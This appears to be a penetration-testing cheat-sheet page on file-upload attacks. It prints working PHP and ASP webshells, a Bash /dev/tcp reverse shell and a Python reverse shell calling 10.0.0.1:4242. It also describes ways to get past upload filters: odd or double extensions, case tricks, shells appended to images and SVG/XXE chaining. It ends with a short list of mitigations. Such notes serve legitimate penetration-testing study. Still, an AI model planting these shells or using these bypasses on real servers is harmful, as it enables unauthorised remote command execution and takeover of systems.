File Uploads

Ways to upload files to a server for backdoor or RCE purposes

Basic Webshell Uploads

PHP RCE

<?php system('hostname'); ?>

PHP Webshell

<?php system($_REQUEST['cmd']); ?>

ASP Web Shell

<% eval request('cmd') %>

Basic Reverse shells

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Python3

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Extension Bypassing

Uncommon extensions (Can be fuzzed)

shell.phtml

Case Manipulation

Double Extension / Reverse Double Extension

Shells in Images

Create an empty image with

Upload the image and intercept it with BurpSuite. Append the shell at the end

Checks are typically done on

  • Extension names

  • Content types

  • Mime types

Play around with those to find a bypass

SVG files and XXE

An SVG file contains XML code, which can be chained with XXE vulnerabilities

Mitigations

  • Extension Validation

  • Content Type Validation

  • Mime Type Validation

  • Prevent upload path disclosure

PreviousInstallationNextFile Transfers

Last updated